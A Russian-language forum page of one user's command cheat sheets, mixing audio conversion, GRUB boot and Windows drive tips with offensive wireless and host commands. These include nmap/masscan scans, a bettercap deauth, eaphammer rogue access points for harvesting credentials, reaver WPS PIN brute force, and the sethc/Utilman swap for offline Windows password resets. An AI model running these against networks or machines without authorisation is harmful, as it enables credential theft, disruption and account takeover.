"Форум на сайте Чагадаева"

Пожалуйста, войдите или зарегистрируйтесь.

Расширенный поиск  

Новости:

3 апреля 2017 года 21:36
Уже дней пять идёт очередная атака спамеров. Изменил вопрос при регистрации - спам пошел от гостей. Отключил (возможно временно) возможность писать гостям.

Страницы: [1] 2 3 ... 10
 1 
 : 30 Января 2026 года, 20:33 
Автор adc - Последний ответ от adc
Использовать программу shntool.

Разрезать file.flac на треки, извлекая данные о длительности треков и их названиях из файла file.cue; полученные файлы создавать в формате flac и именовать по маске "Номер дорожки - Название дорожки"
shntool split -o flac -t "%n - %t" -f file.cue file.flac

Перекодировать file.flac в file.mp3
flac.exe -d --stdout file.flac | lame.exe --preset insane - file.mp3

 2 
 : 24 Апреля 2022 года, 11:30 
Автор adc - Последний ответ от adc
Код: (default_connection.rdp) [Выделить]
compression:i:1
session bpp:i:16
prompt for credentials:i:0
full address:s:31.173.91.133:33890
username:s:adc
drivestoredirect:s:D:\;

 3 
 : 04 Ноября 2023 года, 23:03 
Автор adc - Последний ответ от adc
xfreerdp3 /u:<user> /p:<password> /v:<IP>:<port> /w:1910 /h:1000
rdesktop -u <user> -p <password> <IP>:<port>

 4 
 : 28 Января 2026 года, 00:19 
Автор adc - Последний ответ от adc
ARP Scan, masscan, nbtscan
arp-scan --interface wlan0 --verbose 192.168.88.0/24
masscan --banners --open-only --rate 10000 --ports 1-1000 192.168.88.0/24
nbtscan -v 192.168.88.0/24

nmap
nmap -sS -Pn --top-ports 1000 192.168.88.0/24
"-sS" - сканирование TCP SYN (Stealth Scan) - относительно скрытное и быстрое
"-Pn" - отключить ping-проверку хостов перед сканированием портов
"--top-ports 1000" - сканировать 1000 наиболее распространенных портов

nmap -sn -PE --ttl 65 --traceroute -oN nmap_res.txt 10.0.0.0/8 192.168.0.0/16 172.16.0.0/12
"-sn" - только обнаружение хостов, без сканирования портов
"-PE" - обнаружение хостов с использованием ICMP Echo Request (ping)
"--traceroute" - после обнаружения выполнить трассировку маршрута к хосту
"-oN nmap_res.txt" - сохранять результаты работы в файл

 5 
 : 23 Января 2026 года, 15:53 
Автор adc - Последний ответ от adc
bettercap — the Swiss Army knife for Wi-Fi, Bluetooth Low Energy, wireless HID hijacking, CAN-bus and IPv4 and IPv6 networks reconnaissance and MITM attacks.

bettercap -iface wlan1

wifi.recon on
set ticker.commands 'clear; wifi.show'
ticker on
wifi.recon.channel 9
wifi.deauth 58:23:8c:7e:ed:13


bettercap WEB UI - http://127.0.0.1:8080/ , username: user, password: pass.
bettercap -iface wlan1 -eval "ui on"

 6 
 : 23 Января 2026 года, 15:02 
Автор adc - Последний ответ от adc
В WPA2-Personal (Wi-Fi Protected Access 2 - Personal) используется единый всех клиентов данной беспроводной сети PSK (Pre-Shared Key) — статический ключ (пароль, кодовое слово) минимальной длиной 8 символов, который задается в настройках точки доступа, и шифрование AES (Advanced Encryption Standard).

В WPA2-Enterprise MGT (Machine-Generated Token) вместо PSK используется аутентификация по протоколу 802.1X на сервере RADIUS (Remote Authentication Dial-In User Service), при этом у каждого пользователя свои логин и пароль, что снижает риск компрометации учётных данных.


Создать сертификат RADIUS для точки доступа (необходим для любой атаки, затрагивающей EAP)
eaphammer --cert-wizard

Создать поддельную точку доступа для сбора учётных данных - интерфейс wlan1, канал 11, имя "MyAP"
eaphammer -i wlan1 --channel 11 --auth wpa-eap --essid MyAP --creds

Создать поддельную точку доступа для сбора учётных данных - интерфейс wlan1, канал 11, имя "MyAP", предложить сначала самые слабые методы EAP
eaphammer -i wlan1 --channel 11 --auth wpa-eap --essid MyAP --negotiate weakest --creds

Создать поддельную точку доступа для сбора учётных данных - интерфейс wlan1, канал 11, имя "MyAP", предложить сначала EAP-GTC, затем перейти к более надёжным методам для ускорения согласования EAP
eaphammer -i wlan1 --channel 11 --auth wpa-eap --essid MyAP --negotiate balanced --creds

 7 
 : 20 Января 2026 года, 19:01 
Автор adc - Последний ответ от adc
Существует два типа WPS:
• WPS с кнопкой — её нужно нажать на точке доступа и на клиенте с интервалом меньше пары минут;
• WPS в виде PIN-кода из 8-ми цифр — на клиенте нужно ввести тот же код, что и на точке доступа.
Математически из 8-ми цифр может быть 100 000 000 комбинаций. Однако первые 4 и следующие 3 цифры проверяются независимо друг от друга, а последняя цифра вычисляется как контрольная сумма предыдущих 7-ми, что сокращает брутфорс до 11 000 возможных комбинаций и делает возможным такую атаку.

Для работы необходимо сначала перевести Wi-Fi интерфейс в режим мониторинга!

wifite -i wlan1
wash -U -p -i wlan1
reaver -i wlan1 -vv --pixie-dust -b <BSSID>
oneshot.py -i wlan1

 8 
 : 26 Декабря 2025 года, 12:50 
Автор adc - Последний ответ от adc
1. Загрузиться с установочного диска/флешки Windows.
2. В программе установки нажать клавиши [Shift]+[F10], откроется командная строка.


Вариант 1
3. В появившейся командной строке ввести:
Код: (Для Windows 7 и Windows 8) [Выделить]
MOVE C:\Windows\System32\sethc.exe C:\Windows\System32\sethc1.exe
COPY C:\Windows\System32\CMD.exe   C:\Windows\System32\sethc.exe

Код: (Для Windows 10 и Windows 11) [Выделить]
MOVE C:\Windows\System32\UtilMan.exe C:\Windows\System32\UtilMan1.exe
COPY C:\Windows\System32\CMD.exe     C:\Windows\System32\UtilMan.exe

4. Закрыть командную строку, выйти из программы установки.
5. Загрузить компьютер с жёсткого диска.
6. Нажать на [Shift] 5 раз, откроется командная строка.


Вариант 2
3. В появившейся командной строке ввести regedit.
3.1. В Редакторе реестра выделить HKEY_LOCAL_MACHINE, затем в меню выбрать "Файл" ➔ "Загрузить куст" ➔ выбрать файл <каталог Windows>\System32\config\SYSTEM, отредактировать следующие параметры
[HKEY_LOCAL_MACHINE\SYSTEM\Setup]
"CmdLine"="cmd.exe"
"SetupType"=dword:00000001
3.2. В меню выбрать "Файл" ➔ "Выгрузить куст".
4. Закрыть Редактор реестра, командную строку, выйти из программы установки.
5. Загрузить компьютер с жёсткого диска.
6. При загрузке автоматически откроется командная строка.


Общее
7.1. Вывести список пользователей командой
net user
7.2. Изменить пароль нужного пользователя командой
net user <имя_пользователя> <новый_пароль>

 9 
 : 25 Декабря 2025 года, 12:39 
Автор adc - Последний ответ от adc
Показать диски и разделы
ls -lh

Показать файлы в данном разделе
ls -lh (hd1,gpt6)/

Загрузить Linux (пути задаём используя символические ссылки)
root=hd1,gpt6
linux vmlinuz root=/dev/nvme0n1p6
initrd initrd.img
boot

Загрузить Linux (полные пути, помогает клавиша TAB)
root=hd1,gpt6
linux /boot/vmlinuz-6.16.8+kali-amd64 root=/dev/nvme0n1p6
initrd /boot/initrd.img-6.16.8+kali-amd64
boot

Загрузка с внешнего диска
root=hd1
chainloader +1
boot

 10 
 : 07 Августа 2025 года, 00:02 
Автор adc - Последний ответ от adc
Проблема: Windows 11 не даёт безопасно извлечь внешний USB-диск, сообщение:
«Windows не удается остановить "Том", так как оно используется программами. Завершите все программы, которые могут использовать его, а затем повторите попытку.»
или
«Устройство ещё используется. Завершите выполнение всех программ и закройте все окна, которые могут использовать это устройство, а затем повторите попытку.»

Решение: возможно поможет что-то из этого


Диспетчер Транзакционных Ресурсов будет очищать метаданные при следующем подключении на диске Y:
fsutil resource setAutoReset true Y:\

Остановить Диспетчер Транзакционных Ресурсов - в большинстве случаем после этого получится извлечь диск стандартными средствами
fsutil resource stop Y:

Отключить том (если не помогла предыдущая команда)
fsutil volume dismount Y:


Открыть диалог безопасного извлечения устройств
RunDll32.exe shell32.dll,Control_RunDLL hotplug.dll

Страницы: [1] 2 3 ... 10